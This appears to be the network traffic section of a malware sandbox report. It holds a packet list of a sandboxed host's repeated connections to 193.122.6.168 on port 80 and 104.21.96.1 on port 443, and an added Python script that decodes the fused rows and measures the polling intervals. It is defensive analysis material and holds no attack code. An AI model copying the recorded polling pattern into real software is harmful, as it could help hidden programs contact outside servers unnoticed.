Jan 16, 2025 08:29:15.186397076 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.186495066 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.186506033 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.186639071 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.253555059 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.253689051 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.253772020 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.253783941 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.253900051 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.254379988 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.254451990 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.254874945 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.254997969 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.255018950 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.255166054 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.256023884 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.256088972 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.256094933 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.256102085 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.256189108 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.256746054 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.256818056 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.256830931 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.256835938 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.256978035 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.257718086 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.257833958 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.257838964 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.257950068 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.258606911 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.258712053 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.274490118 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.274588108 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.274602890 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.274626017 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.274744034 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.340490103 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.340569973 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.340591908 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.340626001 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.340764999 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.340878010 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.340974092 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.341258049 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.341321945 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.341486931 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.341573000 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.341639042 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.341696978 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.341707945 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.341803074 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.342308998 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.342430115 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.342520952 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.342592955 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.342605114 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.342699051 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.343238115 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.343328953 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.343339920 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.343436956 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.359872103 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.359966040 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.360137939 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.360297918 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.360310078 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.360383034 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.406102896 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.406225920 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.427061081 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.427165031 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.427196980 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.427305937 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.427393913 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.427484035 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.427541018 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.427623034 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.427788019 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.427892923 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.428479910 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.428544044 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.428595066 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.428601980 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.428760052 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.431687117 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.431794882 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.431864023 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.431971073 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.432061911 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.432107925 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.432248116 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.432343006 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.446770906 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.446952105 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.446974993 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.446996927 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.447037935 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.447254896 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.447326899 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.447338104 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.488296032 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.492675066 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.492744923 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.513668060 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.513736010 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.513767004 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.513823986 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.513951063 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.514007092 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.514117002 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.514175892 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.514389038 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.514445066 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.514457941 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.514523983 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.514553070 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.514609098 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.514688969 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.514741898 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.514834881 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.514885902 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.515305042 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.515366077 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.515491962 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.515543938 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.515554905 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.515607119 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.533468962 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.533545017 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.533543110 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.533576965 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.533617020 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.579643011 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.579737902 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.579777002 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.600687981 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.600743055 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.600775957 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.600821972 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.600856066 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.600887060 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.600923061 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.600960016 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601039886 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601048946 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601124048 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601145983 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601191044 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601541042 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601602077 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601608038 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601623058 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601665020 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601671934 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601712942 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601717949 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601772070 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601814032 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.601856947 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.601938009 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.602006912 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.602251053 CET  443          49731      50.116.86.44  192.168.2.4
Jan 16, 2025 08:29:15.602339983 CET  49731        443        192.168.2.4   50.116.86.44
Jan 16, 2025 08:29:15.620229959 CET  443          49731      50.116.86.44  192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620301962 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620331049 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.620348930 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620369911 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.620381117 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.620393991 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.620449066 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.666356087 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.666502953 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.687421083 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.687498093 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.687520981 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.687572956 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.709991932 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.710022926 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:15.710037947 CET49731443192.168.2.450.116.86.44
                                                                                      Jan 16, 2025 08:29:15.710046053 CET4434973150.116.86.44192.168.2.4
                                                                                      Jan 16, 2025 08:29:20.948019981 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:20.952980995 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:20.953063965 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:20.953425884 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:20.958215952 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.591346979 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.595254898 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:21.600017071 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.783902884 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.798005104 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:21.798039913 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.798140049 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:21.818823099 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:21.818865061 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:21.836380005 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:22.278369904 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.278539896 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.318136930 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.318167925 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.318553925 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.368448973 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.384469032 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.427371979 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.490453005 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.490530968 CET44349733104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:22.490611076 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:22.550962925 CET49733443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:33.894598007 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:33.899632931 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:33.899770021 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:33.900171995 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:33.904959917 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.532540083 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.542181969 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:34.547164917 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.727545023 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.729547977 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:34.729595900 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.729671001 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:34.740889072 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:34.740919113 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:34.882496119 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:35.194977999 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.195054054 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.197469950 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.197484970 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.197818995 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.382472992 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.672631979 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.719340086 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.773648024 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.773720980 CET44349741104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:35.773770094 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:35.776849031 CET49741443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:40.956370115 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:40.961158037 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:40.961431026 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:40.961503983 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:40.966259956 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.597172976 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.601150036 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:41.606113911 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.795888901 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.800142050 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:41.800261021 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.800486088 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:41.816404104 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:41.816445112 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:41.869303942 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:29:42.282965899 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.283049107 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.287605047 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.287638903 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.288083076 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.330719948 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.375340939 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.441792011 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.441864967 CET44349743104.21.96.1192.168.2.4
                                                                                      Jan 16, 2025 08:29:42.441927910 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:29:42.444498062 CET49743443192.168.2.4104.21.96.1
                                                                                      Jan 16, 2025 08:30:26.783025026 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:30:26.783071041 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:30:39.728189945 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:30:39.732371092 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:30:46.795960903 CET8049742193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:30:46.796040058 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:01.887059927 CET4973280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:01.892184973 CET8049732193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:31:14.752636909 CET4974080192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:14.757421017 CET8049740193.122.6.168192.168.2.4
                                                                                      Jan 16, 2025 08:31:21.799676895 CET4974280192.168.2.4193.122.6.168
                                                                                      Jan 16, 2025 08:31:21.804487944 CET8049742193.122.6.168192.168.2.4
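The packet list above is the only per-packet record in the report, and the export it comes from runs the five columns (timestamp, source port, destination port, source IP, destination IP) together with no separator, so a raw row such as 4434973150.116.86.44192.168.2.4 can be read several ways. The example below is added here and is not part of the Joe Sandbox report: it decodes a subset of those raw rows (copied from the table) back into 5-tuples, rebuilds the client-to-server flows, and measures the interval between successive new connections to each server. It assumes the analysis host is 192.168.2.4, that the only server-side ports are 53, 80 and 443, and that the client side always uses a Windows ephemeral port (49152 and up); the function names are this example's own.

```python
"""Recover 5-tuples from the packet list above and time the repeated connections."""
import re
from collections import defaultdict, namedtuple
from datetime import datetime

LOCAL_IP = "192.168.2.4"        # assumption: the sandbox VM's address
SERVICE_PORTS = {53, 80, 443}   # assumption: the only server-side ports in this capture
EPHEMERAL_MIN = 49152           # start of the Windows dynamic (client) port range

Packet = namedtuple("Packet", "ts sport dport src dst")
ROW_RE = re.compile(r"^(?P<ts>.+? CET)(?P<tail>[\d.]+)$")

# Raw rows copied verbatim from this report's TCP packet export (a subset, one or two per connection).
SAMPLE_ROWS = """\
Jan 16, 2025 08:29:15.600743055 CET4434973150.116.86.44192.168.2.4
Jan 16, 2025 08:29:15.600821972 CET49731443192.168.2.450.116.86.44
Jan 16, 2025 08:29:20.948019981 CET4973280192.168.2.4193.122.6.168
Jan 16, 2025 08:29:20.952980995 CET8049732193.122.6.168192.168.2.4
Jan 16, 2025 08:29:21.798005104 CET49733443192.168.2.4104.21.96.1
Jan 16, 2025 08:29:21.798039913 CET44349733104.21.96.1192.168.2.4
Jan 16, 2025 08:29:33.894598007 CET4974080192.168.2.4193.122.6.168
Jan 16, 2025 08:29:34.729547977 CET49741443192.168.2.4104.21.96.1
Jan 16, 2025 08:29:40.956370115 CET4974280192.168.2.4193.122.6.168
Jan 16, 2025 08:29:41.800142050 CET49743443192.168.2.4104.21.96.1
Jan 16, 2025 08:31:21.804487944 CET8049742193.122.6.168192.168.2.4
"""


def valid_ip(s):
    """Strict dotted quad: four octets, 0..255, no leading zeros."""
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and int(p) <= 255 and (p == "0" or not p.startswith("0")) for p in parts)


def parse_ts(ts):
    # The report prints nanoseconds; datetime holds microseconds, so the fraction is trimmed.
    base, frac = ts.replace(" CET", "").split(".")
    return datetime.strptime(base, "%b %d, %Y %H:%M:%S").replace(microsecond=int(frac[:6]))


def parse_fused_row(row):
    """Split one fused row into a Packet; raise unless exactly one decoding survives the constraints."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    ts, tail = parse_ts(m["ts"]), m["tail"]
    first_dot = tail.index(".")
    found = set()
    for ip_start in range(max(0, first_dot - 3), first_dot):   # first octet is 1-3 digits
        ports, rest = tail[:ip_start], tail[ip_start:]
        for split in range(7, min(len(rest) - 7, 15) + 1):      # a dotted quad is 7..15 chars
            src, dst = rest[:split], rest[split:]
            if not (valid_ip(src) and valid_ip(dst)) or LOCAL_IP not in (src, dst):
                continue
            for cut in range(1, len(ports)):
                a, b = ports[:cut], ports[cut:]
                if b != "0" and b.startswith("0"):
                    continue                                    # ports are never zero-padded
                sport, dport = int(a), int(b)
                svc = [p for p in (sport, dport) if p in SERVICE_PORTS]
                eph = [p for p in (sport, dport) if EPHEMERAL_MIN <= p <= 65535]
                if len(svc) == 1 and len(eph) == 1:
                    found.add(Packet(ts, sport, dport, src, dst))
    if len(found) != 1:
        raise ValueError(f"{len(found)} decodings for {row!r}")
    return found.pop()


def parse_rows(text):
    return [parse_fused_row(r) for r in text.splitlines() if r.strip()]


def reconstruct_flows(packets):
    """Group packets by (client IP, client port, server IP, server port), whichever way they travel."""
    flows = {}
    for p in packets:
        key = (p.dst, p.dport, p.src, p.sport) if p.sport in SERVICE_PORTS else (p.src, p.sport, p.dst, p.dport)
        f = flows.setdefault(key, {"first": p.ts, "last": p.ts, "packets": 0})
        f["first"], f["last"], f["packets"] = min(f["first"], p.ts), max(f["last"], p.ts), f["packets"] + 1
    return flows


def connection_gaps(flows):
    """Seconds between successive new connections to each server:port, i.e. the polling interval."""
    starts = defaultdict(list)
    for (_cip, _cport, sip, sport), f in flows.items():
        starts[(sip, sport)].append(f["first"])
    return {srv: [round((b - a).total_seconds(), 3) for a, b in zip(sorted(t), sorted(t)[1:])]
            for srv, t in starts.items()}


if __name__ == "__main__":
    flows = reconstruct_flows(parse_rows(SAMPLE_ROWS))
    for (cip, cport, sip, sport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        print(f"{cip}:{cport} -> {sip}:{sport}  packets={f['packets']}  {f['first'].time()} .. {f['last'].time()}")
    for srv, gaps in connection_gaps(flows).items():
        print(srv, "seconds between new connections:", gaps)
```

Run as a script it prints one line per flow and the gaps between new connections per server. On the rows included, the three plaintext connections to 193.122.6.168:80 start 12.9 s and 7.1 s apart, and each is followed about 0.85 s later by a TLS connection to 104.21.96.1:443, the same order in which the two names are resolved in the DNS tables. A row that admits two decodings raises instead of guessing, which is the behaviour you want when the export is the only record.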
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 16, 2025 08:29:13.549662113 CET | 55022 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2025 08:29:14.105671883 CET | 53 | 55022 | 1.1.1.1 | 192.168.2.4
Jan 16, 2025 08:29:20.871078014 CET | 64014 | 53 | 192.168.2.4 | 1.1.1.1
Jan 16, 2025 08:29:20.878156900 CET | 53 | 64014 | 1.1.1.1 | 192.168.2.4
